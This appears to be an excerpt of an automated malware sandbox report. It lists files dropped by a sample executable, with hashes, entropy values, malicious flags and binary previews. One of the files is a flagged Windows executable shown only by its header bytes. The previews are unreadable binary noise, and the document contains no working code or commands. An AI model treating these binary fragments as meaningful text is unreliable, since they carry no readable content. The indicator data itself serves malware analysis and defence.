...k.z..J.C........6!=.9........,..R-.w....m..}....Xzr...r..,....D1....u..=u..K...&Uo.\._.8...W4.=_.Z.+..y.Z.81...".R....\=...?s..-..#.D.*........]6h].~......J..~wM.?.......0..4h.ue9XiW".3.t=.>..@._.].......}..s.S.D;=..S.MT.h.y.5f.Mn...8.j..j.K.R.......".d..}.Ui...=...U..&..."..F.*...t}...Zm.39.\<..|.L..tN..X;...~..p....*1..W,..yI.^....N..YL;Q.V.*....n.,|..bC....YYM..7.nh.>..%......iE=.k...|.^...N.z..Vt-$..l..K...*0..5D........$.e..Q.ML..,#....~.]..s...hcu.%.4H..?o...{Y....l..F..WB...k.keA.>~...O.N.....o.Hk......Z~G.=v.,...R..[|I.y.=%...Ffk.9h%..4m..%.}.|.Z...l.@E"h.{_P..V.t....GO3.d.f.h...|.l.*.. S@.(j.0.&!nrh........T..E.1.1.h....1.'/,..._.>.w|X9.po-.M.&.xRE...YL.w4..%..]..n....s.SL...R.C5.p...... .{..~.Z~.]...1:i
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):8547662
              Entropy (8bit):5.205173154939109
              Encrypted:false
              SSDEEP:49152:P38OPKW0ANge+q80Ibxh0T4tI6lIfKi5YJj1PKu1ZKKOT:vF1qd/LKNT
              MD5:C815328514B14C1DEB92D8C3585E44DB
              SHA1:2BBD0C3F94BE356F8F5536313F32E2F4C7F51033
              SHA-256:1ACA633261AA978B867A585F8A05B30E2E3B492EFE8C1AF81AD3D6ABE8854A49
              SHA-512:DF8C17C55AC3E2A07A3F13056F2CA3CEA94A2B495E95DBF0136A0D62C1E95C6CC198A0178F16F4660DC1D8CEAD8CD822577E08296B33DC149BC090BAA497A338
              Malicious:false
              Preview:Micro..D..-NkJ.9.].x..(LS`..3.SJ..3..X.QC3."....H...+9R.K....3{.A.:.....>.;..j.........I@w.......]q....A9#.g...n7YzT.a...BP.u.......{g.l.....M..p.i}.R.8^.]S...N.&....7c../..g]...D....f...,.....kE.......)O$......P...W8J....u ...%.#.Ow.>.1..|.d#.!<d. .t... ...Y.f..+yJO..2Qp.....--.i..g...gH6B....Pa.....z......e/.....\..YT.!._zy[...4..n.bma..#.I.@.'-....J.........'. "..0[W.P..X...2..#...<[.W.-..).V.j`......x...T.16.....n.C...$.T..e..H.)...*XAkz...}.3.....;o...'.5.l.'.\.$.G.C7fT..".`.u.!t.j8.....!n.Q...uz.;..rCn....2......6.;..P.?..{...-..4.a\Q.'.W..a.B.....Fc'......d.A;mf.=........^.~E...-.....*$.6).-9./.2lO..fi.p......q..vU2.Pt[....bC......Q..W.W..l....s...J........D2..~.3.8.....Q...V }....|..a.u...ai5..2Q.............R,7.xD#l4...l...'R.~o..<\?.Jd.}<H..]..E.u]..W.....4YU9.`.O....;...+_...(.......-.:5.R.........=(.....EEPg....P........-..L...I.)..^ ..W..Q.I_P..]JqVFZg...OY....n-.`8..B.*eg.I.....+B.. .>....e..G....n..B.............S.bn...g.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):8547662
              Entropy (8bit):5.205036202311105
              Encrypted:false
              SSDEEP:49152:xfo38OPKW0ANge+q80Ibxh0T4tI6lIfKi5YJj1PKu1ZKKO7:xfuF1qd/LKN7
              MD5:292782128C30B493F41AE3A95C6A32D6
              SHA1:34740D1AA397543574AAF62D548780305BCBEB15
              SHA-256:1C5957FA3EF559C4FADDB5E319973A100946F99B21FB34C0B24BFE41C6ECD836
              SHA-512:146F3F8376AE83BDF39271A3CBD3473C2CFE40E1A52A850E9E7688D6C5CFEBCBC0D9FB40E49B0DA55B93015B3B58848C08BA57552824212B941E29C0FC8C7D2C
              Malicious:false
              Preview:Micro)`..e.j.F.n..s...>...c.o._y..6.R.e..(..}@..)........@.l'.....1.....aEG.=../.h..........6...H/..a.....3.7.m.1 .O...(...f...;...7.u.....1....Yyo.... cy.n]I.k....Qq..D...S..<~O/..D..[.Ao#(....B...Z$D..zj$`...}fW.>g..i....*.#.\..L 6..U.\.......d..U`.;....K9k...&..W...K.....Z6{c...".E.(^:..6.0j!........(...w..?..jR..^!.DM..:...9:.zn...H...9....Z&.R_.o\i....F...c.6.K..%. .....$.Y....G...........h..2:..........C.s{.u/..........@.e.}.$..\....2C..f..5...".......w..b.Z,._..A.........v-..esd.....w.q....!rO...2....9..3.n..k.)!..Y.....xI....KxeB.8s.5Z#.....1..F..C.Z......$Y$~...O....t.V=.L...I.Y.Z.%y.....m..........@..c.`..c.N.~r:..a...{.....ki-.Bp/>...`L.....v.e.|L4..R....g@.7.....t_H.%...9..M.=(.-Ye,B......Z..H]...F.\...]F^Z..`^..e>..|...Q..%..hB....P.g.k.mD^..>~;.....(..5..U......i.\l...~t..r...p'...<.e.,`\o...<.nS",=~....M.........v....;..x.j....N7HV...U..=.4...?.13L..QtI..f.U{.Bk...F...........;..^..3.@.+.T....^.....S.?.Q..I..4n...>/.jU.CKP.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1192270
              Entropy (8bit):5.662173490772761
              Encrypted:false
              SSDEEP:12288:t3eOTaSMclwbEdSPOfMHJQ4aKVmaS4aMz8Pg3lxJo2cvXtQ:oOW9c8EMzBaKVzaYcAqtQ
              MD5:82DC5B7CA2A9AA4B313EE9CF0EFFB45D
              SHA1:26A31D9CE6EBD3808A20C5BFCFF1F957DAF7CF6D
              SHA-256:5A77EDE7863255A99CD8AFD50CC8BF44E4BC37E790B979C30BD178DC259AC299
              SHA-512:E4399042DBBFA5F3BD9BC40D39CDDF18094E00B8663BEC170503DBDE28734ACAF060B807CA41748D3715B0CC766B65822BDE47D9FF8341B06F5D3DBCE0970432
              Malicious:false
              Preview:Micro..'....uh...g...l.NF...yX2...:Y..N.}.....,...Q.}<.C.:.l[e.u..k..|c....2..Ne....!.H#.-.. ..K[D....)....q(Q}:.J.#...7\.)H*CZ(.}....s.('.+.....y.......f...@%..c......T.*Y....W8.[.....a..v....]....../.r.."....l...(.-..LN`.6...M...P.PI..sFR..N.Xp..ylQ>.|.M.{O.it...$wRic.{..[%N.....$...2..CV8.,..a......l../&....q...Q.g |..b...`..J...9.....M.!..D<`J.E...&.u..^l.cFHHc|:...ug.)O~..gm.....2P...o..^.?9.E,..5.=L..h.7...^....Q.2......Z..@M....%.h}_.BF...B.......~.G......d.#...........H.+P.Ud.h.f.(......a...]...!....5p.k...j...L......#..^y!.....vE..B|..r3...h.)..Qi.N.)y)bXy\a.Z.8uN..o..e......c0..A....S.`l..n..M.S..&g..........L-..D."T8>...A[....<..RBT..P...T..eE....l....K.._Ww....i.........)~MM.].^B..v.....Q.....7.R6m.*..q..]'I.H......j.~.L.V.....u.+...r.....)&.i.8m.o$.CL/.M._-...h.10m.4%...4.....M.J....V._E..%......g".z.E....}2S.}x..Z.....5NQ.eR....=.....p;.R..L.........S.........r{.......m.o.8_..xb.....%...9+..r...o...4R/B..g..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1192270
              Entropy (8bit):5.662724875298339
              Encrypted:false
              SSDEEP:12288:lQ8xDRv5A6JzjRt5fJQ4aKVmaS4aMz8Pg3lxJo2cvXtb:lQADRv5AOVtFBaKVzaYcAqtb
              MD5:2C7E8DEC30E46480D8EAAE87B4CA28AE
              SHA1:644305B3A22765B0FA4C0C6BB0420750823671FD
              SHA-256:24B2CC0C06FAC761412F8DFFA068324BC515D0B65CBEBDF3EDEC16B439888815
              SHA-512:1AF0C8596A6EE1B4465AE9B88B860204BF8729C40518FD9BE634BA98A84D37022C3898A1B10F2D762C8183A80A1CF7B7DF261A2AAD0DA5B17572EC26255C54F1
              Malicious:false
              Preview:MicroM.....~..C.u.d.-.R.....|..T.B.(:.M;.m9....b>L.z.W.......9...~..>W..7w#,......[G4.5.\.8....T/...".q.g.dTVH..l<z...D.I?..('..(.s..t......\<...Af.%T.;.....?a./..p.K..X....k..s...>U..\f...z..HT.|.......".vs...M.....*.&.i.M.7&'g..]z...'kLxSA..e9!....(.x..M...gL.YDJ...1.3.Z8*.[...V10.x5%>.P...w..........PH..A.b&...PaX$......i..Nw...O].Uq~.P..........t.$XA...-..#. .... .70.X...}\..).....9?...+aJlF"..te....'..B..:.'..8%(..B*.%...g.z$.........b..bq.a...........=<...t<t.3G..8...V..(.me....<.o^....s.6.1YG.&.2u.O..A.6.]%,.+..J.b.`...e.G{.xc....i...i..@T>..D...aP.{.....P.s..H...uT...FG..\.p. ..#.R,...u..>.!...aF.}....4...@~4).61.'.Jz.>...8...%.j=.....pdS.-..CF....X(R(..i%. ..O....m-k.......\...U...n7.[F....&..k.l.M.I'z]..lv%........U..l.....M.#.V....9.B"..F.Qv...X.1.q"..........}if.E..}$.....2e..G....+...F6..A.>.Vn.2+.o)@J........\..4.*9c.Z..3....a...e.6?,..?k.,...RRag.ph..)d.,..L.mE...s.e.<...Tb............<J...bY.s.?.-........Om....~..y..Vip..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):776704
              Entropy (8bit):7.741542572539361
              Encrypted:false
              SSDEEP:12288:VI/X+roiofZzZXvGasEKcXm/WThCFrUi/bwV5LYBYH7caEArXMViC53j:gOsiorGLEKT/WThUlbaUYH7lE005
              MD5:8F81E96F8C96DEC003B51826BBD5885F
              SHA1:7B8C4EC9A3808EAA32AB07D1608AD275F34ADBE3
              SHA-256:F7561DE520F21434830D40D74904E93125B76407D477411622BBD829283BA8C4
              SHA-512:8770F01B013E401A3EEF992AA53E7623A0367BF857309FA238781F70F44EF3E1E5697751D2A28B7FF1F35E8FAD921B3FBFEB17F3C9724FAB786934C8EB8EE8CE
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 87%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......f,.0"Mic"Mic"MicM;.c.MicM;.c2MicM;.cAMic+5.c!Mic"MhcQMicM;.c#MicM;.c#MicM;.c#MicRich"Mic........................PE..L.....{_......................M...................@...........................N......8..........................................(....0N..<...................pN.`..................................8...@............................................text............................... ..`.rdata.............................@..@.data.....K..0...&..................@....rsrc....<...0N..>...>..............@..@.reloc...\...pN..^...|..............@..B........................................................................................................................................................................................................................................................................................................................
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:ASCII text, with CRLF line terminators
              Category:modified
              Size (bytes):26
              Entropy (8bit):3.95006375643621
              Encrypted:false
              SSDEEP:3:ggPYV:rPYV
              MD5:187F488E27DB4AF347237FE461A079AD
              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
              Malicious:true
              Preview:[ZoneTransfer]....ZoneId=0
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.870317327693937
              Encrypted:false
              SSDEEP:24:TcLDzoA6j5aBxj1Y8cBQuKraOvecoI7av6Lc+8wVxqPZyd+bD:TcLDD6laBxyyRaOv5yzFxPC8D
              MD5:8E43C14630730E44C4E5302358D4EC39
              SHA1:93799A4868C8B27645CBEDB982F041284EC7CB56
              SHA-256:591824E6697D86A9D812C396357E472F9997FC8C536D33F8ACBEBB640D11FB83
              SHA-512:7A2E9F5C561C5CF8A9F8E31EF96E221A3123FBF515E98239A69E97D655DE3B65CD557F9D1DECA5D4B1F1315E1F7FBAFC4C4155B48998CC9AA3F4D412213A9B5F
              Malicious:false
              Preview:HHWFP..8..$RGHA...cd..t...F...mPS(V.j.:G.v{\E........ .-...{*.].mnU...).9..p...+......i..T/..........T.(..x....*._2......4e{@#.K.~<.3Jy).+......~..4.&.$...!Y......bPg...<...%.L...... .fR.....2.*T....F]<.O.].@0....}.H......X...:.7.S6.s..#...Y.+r]$.AqN....h...np....9y.2+.r.1LU..._.v...>/l.<4..+....c......P?....!......K.....@...P'...2.&a.<.:~...G.....4...DFi?W...y.M[.....n.>........:........../(.X..p...e..5W.....,.....4.\..S....^ 6KA....}......>.....*A.O..*..../._..H.m.e!P.....wE.e.h.d..B.2..w.Uu...2....\.9.:....n....x.....1....@.r3...y.....C..@/.x.._J...[..z..s.|Q....c=..X.......{.%Rug..-...8.+3..9....)...S.\..q.K'..+..l..+.m....AX.#.B|..0{-.f...df..}..v..ref.~.....Fo.~.u......`UbF.*n...!...htt.&0%.7.......s..7...|-.H.U,.J....3..X...#..i....D.`.eHGED{7}.NQ...))...+[1L...l..S..<...x.g.5*".2He...8.s.>..N.Zj....-.....L...&..H...c.9...#@.0.........'....IF..~...x).........Qw\..g..Z..X.ks.%iV.._.9..$.a. za..`_y..]2e.6;iC.n.d..b..~=)..J[...
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.855972501880656
              Encrypted:false
              SSDEEP:24:ZbPKNgY9vNUSWFS9uhBdurCSjeoJ1ZwuYjxPis9nO0DQs70vmiRd+bD:JCN7VeFS9up2jVmPNLfkC68D
              MD5:29F0FF5848EF793B95F7BBDC95892793
              SHA1:21097D8C90B105078DF29A25A2B45735C3C8F5E4
              SHA-256:E3675DE9E8C6E12F7E4D62874CC3AA6EA84F5A3C0D3295BA873E9F748F21FD39
              SHA-512:D29FDF572E1BEF2299F9BFAEEE24522517EF648D96FC9BE5261E0C5C2B947A69848ED39A0FC33FF4A6F152D857241DBF4BC113707857AFC8BE4C333ED5B213B5
              Malicious:false
              Preview:IZMFB..+.ul..W...V..1X.S@.8...e.1Y..B........P..:...IA0.i=..#..H..P6b.i.dK...1..a..H...Xj.Z.h..pJF.%..uV..v.D.P....R...8.f[....}..a..P.N.j#h..B.....G...j6K.X~..M..h&....4...........g.*.6.._Hx.2.!........A..$j.mSJ...0@.?.?k......z=......a}.2e....RJ. ....A.2..C.L.I.@.e9W.9...4...........O..P...{..k..?.....(.....q._...8.F.(.cTK....[M..Rw.....T.C...k?....|..h.....@...........\I..S4i.}4@.e1...^..orS...Y....=.p.qD.w....G..~.&.g.hT..k.N-\.h..K.U......}n\),>..iF.p..!=....jg5.0.-.,........g.y4...[<n..A...5*3..5.;...g`.$.>6.n...M.q......$qT9...ow........|..S.t...2w.}h.C_5...JDa0...B..!.r..d.$g~}.. .A..f.r.n]...7Z.P..U.3...c...........K.B..L....bd...,..3..........4....5..~.Mm.h.....4....Cd.%>.......O.-2'..o.Z..8\N.7....d./Zp....DBu.WX......c.....R[.m|...R)f..W..R..u&SK0.;....CB...}A.\j.=.Oo.Y..m.U.Hq...`..De.Y...J..k..3.<...Y..Y......[5...J..Di....f.JR..k.._..i..D.;V.........y.......zN...V..7............G...8........`.......ik....\..+..4.O.....W......
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.86858783801569
              Encrypted:false
              SSDEEP:24:URgq3KUQwvQo1V881iNdMcHvcu87K+jyd/VBaXlUJvSbLd+bD:URgqtQT84NDPcu8nyd/+kSbR8D
              MD5:2174F1E0A5031350D930B2E0E21F914E
              SHA1:B8F5E3FF2376ED8853FBC4B04CD4BDDD18666F0E
              SHA-256:FF7470EBB74FC2D9B7D70267E035400773C69D3C64FA5A0CC6ECF15F4C7A7F34
              SHA-512:60CDD37CBECD0934316A977C39C0F9CA03F4007F197E18CDABFA448B6E11CB6D2C9DBDBFF9418EC52D2F5D8DAA7A4E8A5ABFE8145E40EB9FB90A0DAA6991C376
              Malicious:false
              Preview:IZMFB.....3....#c'....D..H..t~R..q..&X....6ul.......=.5%.v]!+L4.J.&....... pL.!.F.$.a....C..Aj ..y,...E....?^......hpL.<8.U...4I.c.....1.W. ....mi.<.d........LOm...`......._..7_W>...W....D[{4..]....(.d..!...........>k>Z....W[..u...U.\E.c..1<)R....]PD.p.^(%A..+.p........_......F.f.T.?m.4.9\:..P'zG..;#.tf..%pWp.u.Xp&.VR.q.. .........[....W:.*.]..>.h..9'.....BR/...Q.)...u.,SG.;...t..D.~y`.o.,G..P.z.hb.7.h.a..3.k..y.:'...rM6.wrr.+.h.1. ..q aCc.i.;.O.;.Z........5tn.0<3......"P).._s{.YM.........%..'.}.#4...&........'c..>C.3...........n...h.Ua?:.B...D!...........'.J...@.n....9...94.1U...~....&..]..K..#......_.2.j...7...-..gP..z.a.i......~.N...=...7..7......UT....e.eZ.;).E#.d6.4qi.j.6.....i.B......fV...-.@.F...x.p&..^#..H..z.0.77.?A..?C.CV..#.,Z.d.b..|.'..y.<?)X..wH....^H...QF..3d.(.h.m.@..b........5#..~...7.Q... ..N....2.mX.......z.. b).%.@..H...t../..=.&..>..f...1.o4^....>..||....n.8...J.VQ"d....&.>s.wZ..d.`.9.F$^9Y...B.....y....O.o
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.8557844184976116
              Encrypted:false
              SSDEEP:24:sCMZeNpmgJPLYQlz+elodeKyg1drD6pxFLugSrJo/qBTjkumd+bD:sChpyQlzzoF6xFyXrC/qp88D
              MD5:8BCA477DD960BE52698D6C51CF6D52F1
              SHA1:D57971D6FBB9ABD64EFE3AAC1A2CE5C7D2F56947
              SHA-256:A09A1FE52D193FD54F4C6445CE8F33C6CABFA8DDD829D2051B168FB9A3C39522
              SHA-512:D00D59A261340FDA94EEE7EF006F3657F677B1FF3A7DD4570902101872A667A35051AB4CB4389B22680C693917C12C5B2268C2F8FD2BD64F03D0A86EB244413E
              Malicious:false
              Preview:JJLYA..Yo.eB.y..U.Le.....Kf...^.S.r~.l,N..@Y...t#p@.Uz.b`...%>P|.%.......}...c.W0..........^-'.......u..u.6..?...m..W+....B`..t.....V..B.U.~..<X.U..\..2..k..1..9J..Z...}L .....D..u..y0c.......).i.c.N_UO..C1S}.u|..e....)Z...A....a./wW......vp.h.#A.m.....kT.?MA.cu'..3...*4.G$p..YX..'.c-.Q..#..Q-.jq.l8......?.^..M.A...Dh..}..3..PX.(6.:.N..lm.Z..{^.Oa.^w.I..Kx.f..0.s.)u.&N)..LV.v9....3.....q..L...PuLZ.._.i*........BI.mAG?..G....!|....I.%.;.b.v..o.?.O....`.........%v.J.M.....%..:.../..nV...Ix.Bm.......h.Rr>`.^.....9!...k.'.8L2....}uT..%...dO..........*e(..zB]...n.T.X.Pg.p\..c..........l....Hv.$R....+.AI.~.i!...|...\./..K.......).x..vk...a.@.X.....x<...;B...L..T-r....{.a>.jT..!E..h....P....Y....2..=g.....C.o_0..$.D7....z....._...0.....?.ka.~../UB.V`.yW...qH3..1."4y...E.....@.........p..0E"G.d....K...._.e.F.sIj^..n-?.P..].J.s...q..}.../~I.'..s.+.Z...c....%...#.uVbo.Y ......S ....L.}...[2....:_.g;.......>q.;v.b..A.U......\i...^&...s3.......
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.851353743379769
              Encrypted:false
              SSDEEP:24:PLjhB05Xm3trG5A54iJM0g3I9gccOF4XfiyElBl6p7uwNIJkUe19C42gyXyd+bD:31dS5jiJdP9gOFaElBMpSwNIJkUeWKyZ
              MD5:83149E02661D38DF02B6191A121373C1
              SHA1:A29410454F769E7047C0987B3B7C1940630CB585
              SHA-256:CC41774D15A7527ECCAC64782E850D438BDA6FE6A2D836A2590D5B35549D5D84
              SHA-512:53C07DCB19498001A9662980C3C6D774B4E127C48F90EC89DA6E8421D204692BC8B988E6534B2E1D0B80354EA9A9785D7F401914E1BFAFC485CF115E3E428735
              Malicious:false
              Preview:MNKQC.D..d./{.l........._...S)s.#>aL...6...T..\!6<h-...(.....-.E......k......NVi.a9....}....|..S..5D.#)..Buw...v."..p.9....o...?.2....$....#!......N.O-......%..C.."p.o ..V,..P.....k..&.n.-^.m...]Y%........&k......lx...u?F.}%....LI.d.!.|H...;...Z.&.q...M.tC..<......O.S.o.4'.9...pK ..p....}.._..Z....%Zb.H&...uu....h0#..\.....n.f;\.._e.5V. ....2&W,.I....<....5yA E])....*w....5g...q.o...].E.y..`.g....G1.{.GR.Gh8J8...Jv%.......`..K/..Yp..v.).I........?.... h._BY.r..i...M#.3.....n......._.f^>.}uj../L.Lu ..F?..C.].#...D3.......3..2...c|nUm....2<~R|G.Q<D..d...^.}F.H.Rx.Q0..A...{g..1....&".$..~.R..=..>d._....~4..h0;=p:>k.L.6..a..m.F6.(V..N9..XdS..(.9.r...@T=b...|b..`s<h.>...2.s'...mM.yJ......C.G.......b.Cy.,..&.B"9....#...Lg-{o...41^M.7.Q6...1xZ........In.tT..>.goy.1.wz8.;.J8..H(....pV.LMX..... T.]..:....'.6..NAIc..}0!(.V...:).....b.J....u.[..}xULi!d..Z.<.T+.9.5..i.z...Xg......x..-...".Ic........g!.dU<BA)...>...Pl...~...}>.....H.A.._;."TuKg;t. .
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.85718921287719
              Encrypted:false
              SSDEEP:24:E1YSxniZpCjGkQsoKNUkgAzgxSjaC4Tp5vPMGCyrzEag9akd+bD:EtyhKNUkBzHaC4bPMGCyPENaa8D
              MD5:A37016998672078F18B5E5A139E737CA
              SHA1:E7418CCBE3495A00A8689FEB732F6E56441413D4
              SHA-256:22BAAA0319B27CFEC81C8D285FE8F83B8A0878EB61BA30C1DAB372AD9E871CE2
              SHA-512:C94278085916959268115B3B5834027955A0553A5B55E3F0D0035D73F623828C9EB768801971D92BAE06221BDA2B856EB16FB438C0D215107862C9EAF225BA5B
              Malicious:false
              Preview:NYMMP......Svx..~.}r.{.."....p..>..M~....<.3..p.s..n.x.....b7P.&..$....(.....(..\...G.0..N..a..i..%W...,.`..>........f.....L....>.\.c....gt....b....JZ.An.gfJ.R..1..A...."...Z.80.........*YQr."k..\.^N.......<..?.6..J..*....m..5...f.g...-...7.......7.../.h'.....u..T..'JX..`..X.+...o....eL.....'..u........Qe....E.K...p..b..z.A...O;.]\..K..o..L...U.Y....L......v.|4.;OPM.>..-.....-.y...........F..6K..yo.g....2.....?...0z .o..O...9...,..B..^.9...8.N...,...........J.(.].N..CSR...+e.N.1|.w'^X..br.p#...B.1.n.q..A.H...!.po....I.'p......E!K.N.......V.N.>........z........!..|.C...9..K.t...e`.=..M.'U..[5.......m.v......M.]yt.I2u...+....^.b..J..\.\.v...v ...O..E..g..<=.F.S..)&B..M.xW.l......!... 1.I.2......r@.C6...V|.*.....)2...P......!.r..Q..G......'0...d.R.yxs".U..<3...y...).....cv..V.5..z.]..*2..c7..E....m].u.h.u....1..G...<.R{^....]..gF..BE........!(...aehP...t....7M..".nd,r...(.1"...~U.@_.*@2...nm]3.=.[#..qqF..(.......t.,.\.kUT
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.879233792662616
              Encrypted:false
              SSDEEP:24:53kziOK2izjq6kIMDF+hy7LgN3JBDYVjRNu1MFEoI5pqGgRMkmjJdePmrYakeLd4:90iwizjTMDEsq3HDYVjRNu1TFTl1jJst
              MD5:A937D7927DD25E6D2EC1C341EAAE873A
              SHA1:851BCB897D28DEF704838F23579F89131FECC0E3
              SHA-256:922EF2B5468B214C679EA936147D572741864C44C6382145A21FD34C49AC234B
              SHA-512:6AE426CCA8DFB555F268B055485C55219E0BB40C50FE5725EB4901785474E334A42BBCEC8010194D24E61339CA288E4DE1BB29A4CCD315515E066DFF7D874E6D
              Malicious:false
              Preview:PALRGh..j&..')..:D.R.s..., .T.px.^b B3.9.....Z..b..p....%.\/.T..z*F.3p.8Xr...uk........p..............`....~..m.`..#..T..mo....@......k9D;.{{c......./...A.Y9...^.u.C....=_3v..;.......hn..iQ....5...ij./o..l..|I.|..0Wft>.*.$%a...1...W$.7...........Q.lo.C.x./...........W.<.^........./....(@.?..%]h..]...s......km..@...8h6...8.,..h]W.|...Y5.a/....n...J...P:._......;.....1^..........#..M8f...V.uhc9..F.Y.p...fesfu.%......~#.......7......,..4.V ...qx..;PPv}+%#.S.n..5...@.....=T...C.g?8gq.9...Z..1..c.._......o.........H..).$K..?..r..]!V..Y+.*..4+.:.!......v._' iX.})H..`.....-q.s....T.]..w.K../Hq...c4~C"W..o...L.K.d.`.....eUNJ}.....u0...!...m@..\@.2..)*..Y.s..!L2..B...=..y.rX......H*V..Iu...$g.C...^.8b=.c.DW).;..~.....fe..N.u...?..2..a_$A.FQ..Og.F*..S.J=_..M..;....3..h5.F....yp?..p./.Q'D;....(8..w7..s./...........4.....X..Q...|...j.i....[..j:....a6.>.Kg4./...e..6!....%rj[.vkopc.....]K.6m.^.)H.g....5..~#..R......2Q.y.?...KpX......;c&.S..S.?.T..0..dh!.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.873310863982058
              Encrypted:false
              SSDEEP:24:6753OvhOdi39DV30ZUmurGyRWICOKjVBMvvCr8ETJKYKWsmbJZ4rWAd+bD:Is/1N0ZULB43ZXivCr8ETcYc+H4rW28D
              MD5:2C123511C998E7440A57FDF84B3A3D7F
              SHA1:0D354E03B0DA2C5DD27E846D2171B41724D468F2
              SHA-256:F41108FB255DF116F1AAA7CA9EB230B19995571157D60C4773E283636B83D8C3
              SHA-512:AB1A8BA7E00D30742454F487889E10A46705045D0C17942C12370E0712131E7C339BBA83239855C827E6AFFC12FF0559740C43F0100C18A103C228DCB679C4F0
              Malicious:false
              Preview:PALRGe..HP{.p..........o..@.d.S.[T\....2.k.E..Q....3....[.[.7.....U.g.C.yN...y.!..~.....#f0.8.....L......y.t|qA...{.tg."...E.my]L.&..8k.y.l.=..z...../x...d...4I>...Q.....]~../pF..8...^.q.>.n.._.N...Onx..,....8.<D..a.!Z4.......j.Ql^E.m3.@.^k.. Y..a.6..yd.......X..x.l..G....."?..4d2..$...%.xY..-.iw..<...[?.WA<@.1.N....(Ml..RaC;..)... .j$9R/.H........a...G.=...(d.].?{G..v#..#.....}....JI.LU?..G.Ctx..u2`..........8..Uo.%.u&..T...j.i..n........X`...k..Z....1h..k.q..K..Q3.|T..~..h...pp....h.z...X.%.r.@........h...zy.@N..=.U$...6..{.Rp8......=....h..`....Wm..~a..gS9e..:........|>........;...YK....../5..c..$.....,..U..M..)..{.W...1gn...{....':LiR,`.?U.f.5.#..&.8..o|.....H.7q..(..]..JP..0}..`.'H.Y.....j..Q.M.p.4.^....87......R^.At........0.'..*A.,....C)...:.p..^.0].$...Fk`...&Xs....).....u.....IH..3...~$..0.g..".'%....?..]c+O[bj,......+.c.....s.........`...ek....[....;..~..xCLE>.......{AB.h.}K.6t.R.h...R....D.P.g.".m...1...+U..(..f]3.b{Y=aI>E..u+.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.854019839091665
              Encrypted:false
              SSDEEP:24:8lJowb1Dd5yOl5toy5CW+K9VK+Js000gkgj+Mq39T0q+0d+bD:Udb1Dd5yOnmyH+oG000gtCMKeLq8D
              MD5:B8916DD8D3BB77B807AC4B832B6757EB
              SHA1:900BB89DAC397DACF6D93486A3DA1C613D5DE535
              SHA-256:72D4A0457E3C5B774BDF9653D87B7A4421E40BF8F2096DE165A0E8005178CD32
              SHA-512:B19108CB14E35322D5AE2789F7411E753781D8A069458062AFB7EA74AA072286E9F5F51781A16A5A4824415B85BF63F2CA1927A44CAF555A17F78F6DFE575EE2
              Malicious:false
              Preview:QFAPO...@@m.........zx.]. ..6$....b......;...<v....a...&..-O.....G...eD2.+..d.mq..{.g...Z]....Y%.E}....E4......|.Hn..p&;..)........=.>.6"B.........kP.c-.H.x.sS...$.$r\..qR.#.....m..)(..&.zh...f...G..].....W5....!....?....6.}.z...}.M4.......p.....Q49...}.C.B...zN.].{..vc<.]...~|.|2.W....W..J..`...|.V.......Vd.g...b...!..G...&i/bD...Z.M... ..>J.8......eN..mgh\...l..X....bI..^.^%jD.s5.X[.>....=(...............\..Z...F..ckjR......W...&.8{aj[...#M...\}.a.el...H`g_.........CV.....;..h..I.C.jr<..........m..D50.W8....pK?..7....G...+..w..X.A....&w7 Y.@.2..S...F0Ld.._W.V.9ZC#......."CZe%Ok.`jy.8.u..wB...]5.i.....1;....\wMe..^...i.z..%..w/.5N..7.-.g.y...--R..Q.^75jDQ....K......zl..s...][........}.$.W.y.g.$..O<c.o."7F...VE..~..Z......C..X...;. .g.Q .nR.[........._P.@..de.,.<....B9....\..A$.Ccr...+....#N...'.).....{.SJ.......&..U...y.5..W.U.... Rq.y.gl.6%.m*......._J{.Vh.....+i......8...[....MJY...../:,P......k._iC..;..H.$....KyWy.^.;.....1....v...G..]S
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.844604944652356
              Encrypted:false
              SSDEEP:24:pn6Vhcuni9a2XY3xwRx2G+7Tp9Iu2Af1zCKDGNO4sU2v/aqiMy1RnHy4gQDd+bD:t6luBkxw72nTpxftnD2P32vfiMcS6p8D
              MD5:6C382064A1321B8FCB847E8F784ABAEF
              SHA1:8F862B3535059F91FE6CDC9667D6E78352746099
